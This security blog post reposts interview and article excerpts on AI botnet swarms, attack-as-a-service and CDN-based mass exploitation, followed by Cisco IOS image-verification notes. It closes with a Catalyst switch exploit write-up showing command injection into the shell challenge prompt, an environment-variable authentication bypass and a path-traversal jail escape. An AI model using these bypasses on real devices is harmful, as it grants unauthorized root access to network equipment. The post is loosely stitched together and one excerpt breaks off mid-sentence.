Friday, November 30, 2018

AI and CDN used in Network Exploitation & Attacks (Pt.3)

Working together toward a common goal – attacking networks - that's the task of Intelligent Botnet. Able to share the information on vulnerabilities & hosts, quickly change used strategy without a Botnet horder.

[https://threatpost.com/newsmaker-interview-derek-manky-on-self-organizing-botnet-swarms/136936/]

For over five years Derek Manky, global security strategist at Fortinet and FortiGuard Labs, has been helping the private and public sector identify and fight cybercrime. His job also includes working with noted groups: Computer Emergency Response, NATO NICP, INTERPOL Expert Working Group and the Cyber Threat Alliance.
Recently Threatpost caught up with Manky to discuss the latest developments around his research on botnet “swarm intelligence.” That’s a technique where criminals enlist artificial intelligence (AI) inside botnet nodes. Those nodes are then programmed to work toward a common goal of bolstering an attack chain and accelerating the time it takes to breach an organization.


Threatpost: What are “self-organized botnet swarms?”
Manky: What we are starting to see [are] humans, such as the black-hat hackers, being taken out of the attack cycle more and more. Why? Because humans are slow by nature compared to machines.
Swarms accelerate the attack chain – or attack cycle. They help attackers move fast. Over time, as defenses improve, the window of time for an attack is shrinking. This is a way for attackers to make up for that lost time.
A self-learning swarm is a cluster of compromised devices that leverage peer-based AI to target vulnerable systems. Traditional botnets wait for commands from a bot herder. Swarms are able to make decisions independently. They can identify and assault – or swarm – different attack vectors all at once.

TP: What type of botnets are we talking about here? Botnets used for crippling a network? Where is this technology seen today?
Manky: Hide and Seek is a recent botnet that we have seen with the swarm technology in it.

TP: So, what makes Hide and Seek unique?
Manky: Typically a botnet will receive a command from the attacker, right? They go DDoS the target or try to exfiltrate information. But what we are starting to see with these new peer-to-peer botnets is they are able to share those commands – between botnet nodes – and act on their own without an attacker issuing any commands.

TP:  Is this machine intelligence? And, what is it that these botnets are trying to learn from and execute?
Manky: They are collecting data. They are trying to learn information about potential attack targets – that is, exploits and weaknesses that they can launch a successful attack against. They are trying to pinpoint vulnerabilities or holes that they can actually go and launch a successful exploit against. They are looking for a penetration weakness – something they can send payload to. Once they find it, the node can let the rest of the botnet nodes know.

TP: Can you break this down into a likely scenario?
Manky: We’re starting to see this in the world of IoT. A hypothetical situation includes a network where there is a barrier – a network firewall, or policies. On the network is a printer, network attached storage, an IP security camera and a database. Then, for whatever reason, the IP security camera is on the same network segment as database. Now [the attack] can target the printer and infect the network attached storage, which infects the camera. Now the camera can be used as a proxy to gather intelligence.
That intelligence is shared between the nodes. It’s a structured command list where it can say “send me a list of targets that you know, have this within the network segment – along with intelligence on that segment.” And then – when the network configurations match – the nodes can swarm and request the exfiltration of data and launch more attacks.

TP: Is there anything that is unique about the size or agility of these botnets? Does this “intelligence” allow it to be more efficient and smaller?
Manky: Swarms are large by nature. But I would call them first, efficient. Traditional botnets are monolithic. Bot-herders typically rent a botnet out just to [launch] a DDoS attack or just to launch a phishing attack. But with swarms, they have the capability to spin up resources – similar to virtual machines.
Bot-herders can say, “I want 20 percent of this botnet doing DDoS. I want 30 percent doing phishing campaigns.” It’s more about monetization, efficiency and being fast.

TP: When you say “swarms,” can you give me a sense of what you exactly mean by that?
Manky: The best example is what we see in nature – such as birds, bees and ants. When ants communicate they use pheromones between each other. The pheromones mark the shortest path to bring back food to the nest. Ants, in this scenario, aren’t taking orders from the queen ant. They are acting on their own.
Now the same concept is being applied to botnet code. What we are seeing are precursors of this right now. Hide and Seek has the code, but isn’t using it yet.
Hide and Seek is a decentralized IoT botnet. The capabilities are in the code, but we are still waiting for the first full-blown attack using this technique.
I expect to see a lot more of this technology in 2019.

TP:  Where does that leave us on the defense side of the equation?
Manky: It really needs to redefine the network security center. We are going to need more automated tools. It’s going to come down to AI versus AI. We need better security postures that are capable of actually detecting and acting on their own as well.
If you are up against a swarm, it’s very fast by nature. It can already breach a target, by the time a human administrator can detect it. For that reason, the network intelligence needs to be able to understand what it is seeing and be able to act on it.
At a higher level, it comes down to quality of intelligence and how much you trust your

CDN and AI in Network Exploitation (Pt.2)

[https://threatpost.com/how-shared-pools-of-cloud-computing-power-are-changing-the-way-attackers-operate/138108/]

In many ways this migration to the cloud mirrors that of legitimate businesses.

It is much less financially advantageous for attackers to maintain large botnets and maintain the knowledge and expertise needed to avoid detection and grow the bot. The fact that it is much easier to pay somebody else to maintain these things and simply rent time should sound very familiar to anybody that uses a cloud service application like Salesforce or Oracle. The advantages for the attackers are very similar to the advantages gained by a legitimate business. Attackers can offer chunks of their botnet or attack infrastructure for sale. They can gain more money, usually bitcoins, by segmenting their entire bot and selling time on it individually.

DDoS-as-a-service has been around for quite some time and was probably the first foray into the attack-as-a-service model. DDoS-as-a-service was very successful because it removes the necessity for maintaining a large botnet from the attackers themselves. Bot herders could focus instead on growing their botnet and modifying the malware that they used in order to exploit new systems rather than worrying about how much an individual attack was going to impact the botnet as a whole.
From there it was a very short jump to segmenting the bot and allowing for multiple customers to use chunks of it as they needed, rather than throwing the full weight of the bot at a given target. Many of these services operate under the aegis of a “stressor service” for websites to make sure their sites work under load. However, this was merely a fig leaf for the real purpose which was allowing anybody with bitcoin or a credit card to purchase time on a bot and direct attack traffic to a website of their choosing.

The success of this model drove other types of attacks to migrate to the service mode. Ransomware-as-a-service became a very profitable endeavor. Ransomware authors sell turnkey solutions to anybody that has money and provides secure communications, and in some cases even technical support for the victims.

Today, we see a large number of different types of attacks-as-a-service and this makes it very easy for low sophistication attackers to use very high sophistication tools and techniques. Skilled malware authors can use very advanced techniques that would normally be out of the reach of low sophistication attackers, and rather than worrying about being targeted by law enforcement, can simply sell a subscription or a turnkey solution.
This evolution creates new challenges for defenders.

In the past, it would be easy for researchers and security teams with some experience to identify hosting solutions that were known to originate attacks and put them into a network blacklist. This was an easy way to blunt a large number attacks, however as attackers move to cloud services, the fact that there are so many different tenets on these cloud services makes it difficult or impossible to block these IP ranges, and so the first chance of an attack getting past network list is increased dramatically.

Additionally, this type of business makes it possible for low sophistication attackers, or attackers without any knowledge at all, to be able to wield very complicated attack tools against targets simply by paying for a license key.

New technologies are constantly reshaping the business landscape, but business leaders also must consider how these can enable new attacks – or make old mitigations obsolete.

CDN and AI use in Network Exploitation (Pt.1)

[https://threatpost.com/the-nature-of-mass-exploitation-campaigns/139428/]

In this article we’ll talk about the tactics and procedures observed by Akamai researchers and security teams, as they work through the operational response process of a mass exploitation campaign. Mass Exploitation is a term used to convey the process in which attackers launch an attack campaign in large scale using CDN services, or mass mailing services to reach more victims in less time.
The idea starts with an attacker who has a well-formed payload or exploit, which they need to use at scale in a relatively short period of time.
A common example is a zero-day vulnerability that is posted to an underground forum and purchased by an attacker. As that code starts to get used in the wild, there is a finite amount of time before research teams and incident response teams notice the attack and try to mitigate it. Also, vendor timelines for issuing a patch can vary. This varied timeline of the exploit being “exploitable” is what drives mass exploitation.
There are three main categories for problems as they relate to identification of mass exploitation attempts:
Category One (False Positives): Identifying mass exploitation among the noise in your environment can be daunting. For instance, if you are trying to filter on Remote File Inclusion (RFI) attempts and executed payloads, there is a tremendous amount of noise from security vendors running application scans against your environment looking for risks.This is a RFI test from WhiteHat Security and is very common. If the system being scanned is vulnerable it will download the script and execute it. A process which will be monitored and added to the list of things you need to fix for that system.
Example RFI Exploit Code from WhiteHat Security

Category Two: Further complicating the identification of attack campaigns is purposeful obfuscation by attackers who use techniques such as FastFlux domains and sites like Google or Github to reference content which usually doesn’t raise a lot of attention unless you know what you’re looking for.   

Example 1: raw.githubusercontent.com
By utilizing web shells that are located on Github, the attacker doesn’t need to manage multiple copies of the files as there is little chance that site/URL reputation services will blacklist the Github domain. Here the attacker is calling a PHP shell and using Github’s CDN to utilize caching and acceleration of said shell to the target system.
  

Example 2: googleusercontent.com
Attackers have taken advantage of other types of cloud services to distribute their attack traffic as well – one of which is using Google App Scripts. By creating scripts in Google Sheets that contain scripted commands, an attacker can make requests look like they’re coming from a “trusted” location such as Google. Without context, this may go unnoticed or at least harder to identify good versus bad requests due to the nature of where the requests are originating.

An example of a small website hit with a scripted, but distributed GitFlood driving usage costs up over 
1,000%

Unnoticed, until you start to see the volumes of traffic that can be generated from this infrastructure, or if the requests are taking advantage of an application vulnerability to perform mass exploitation.   

Category Three: The third category is “timely” threat intelligence challenges, and large scale visibility challenges. If Blue Teams can only see threat info on traffic that comes to their own environment, then it’s challenging to see larger scale trends or patterns as efficiently.
We frequently see malicious actors upload their malware/exploit code to more than one third-party website or CDN in an attempt to re-use it, usually for redundancy purposes or if security devices add the URL to a blacklist.
When tracking samples, we identified that they were being accessed by more than one originating IP/ASN which tells us that attackers are proxying through IPs/ASNs when attempting large scale RFI attacks. This technique usually indicates the use of Fast Flux domains.
Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies. Fast Flux usage is becoming common for two reasons.

  1. Compromised hosts storing exploit code are being discovered quickly and taken offline before the attackers can make use of them.
  2. Because attackers are launching exploits at many systems as part of large scale exploitation attempts, they require payloads to be highly available.  For this reason, we are seeing an increase in the use of low cost CDN’s to deploy/host attack exploit data.
There are other examples of how attackers win by using mass exploitation campaigns, but to increase the success rate for defending against the above techniques Blue Teams must focus on three distinct areas:
Interstitial inspection: Using reverse proxies or some form of interstitial device/process to perform inspection and validation of requests prior to sending traffic to back end application servers.
Large scale data / threat correlation: The more data you have about an inbound request (application workflow wise) or IP address via threat intelligence sources, the better. The main thing to focus on here is that you have as much info as possible which usually involves a threat feed and data sharing relationships with partners.
Layered defenses: It’s highly valuable to have both perimeter and forward-facing defenses as well as defenses inside or behind the firewall to watch for malicious activity inside the corporate network as well as requests going out to the internet.






IOS image verfication - running+saved

Verify the authenticity and integrity of the binary file by using the show software authenticity file command. In the following example, taken from a Cisco 1900 Series Router, the command is used to verify the authenticity of c1900-universalk9-mz.SPA.152-4.M2.bin on the system:
Router# show software authenticity file c1900-universalk9-mz.SPA.152-4.M2

File Name                     : c1900-universalk9-mz.SPA.152-4.M2
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
In addition, administrators can use the show software authenticity running command to verify the authenticity of the image that is currently booted and in use on the device. Administrators should verify that the Certificate Serial Number value matches the value obtained by using the show software authenticity file on the binary file. The following example shows the output of show software authenticity running on a Cisco 1900 Series Router running the c1900-universalk9-mz.SPA.152-4.M2 image.
Router# show software authenticity running
 
SYSTEM IMAGE
------------
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
    Verifier Information
        Verifier Name         : ROMMON 1
        Verifier Version      : System Bootstrap, Version 15.0(1r)M9, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
This example also shows that the Certificate Serial Number value, 509AC949, matches the one obtained with the previous example.

Cisco IOS-XE - Request Platform System Shell

Verifying Authenticity for Digitally Signed Images


Older 3560 & 3580 switches vulnerability:
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]

Workaround:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]

No input validation ==>  just use the ' '
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: SecureShell [debug]Key verification failed
Switch#
  
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
  
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
[/code]

Netcat found ...
[code]
bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
[/code]

What can be done with it? Whatever reality you want, you might create...
[code]

[EXTRA]    Building a toolchain for:                 
[EXTRA]      build  = x86_64-unknown-linux-gnu
[EXTRA]      host   = x86_64-unknown-linux-gnu
[EXTRA]      target = mips-unknown-elf           

bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped

[/code]

When you request shell following thing happens:

a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response') (same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads via libcodesign_pd.so+libflash.so 2k from /dev/mtdblock6, signs challenge, compares to response and return 0 if it is valid, other wise
c) so anything like ||/bin/true will work just fine

shell_wrapper ignores verification if DISABLE_SHELL_AUTHENTICATION=1 in environment

mtdblock6 RSA public key can be changed, so you can generate valid response by having its secret companion
[code]
you can escape IOS filesystem jail (/mnt/sd3/user) with ../../ sop copy foo ../../etc would copy foo to /etc
[/code]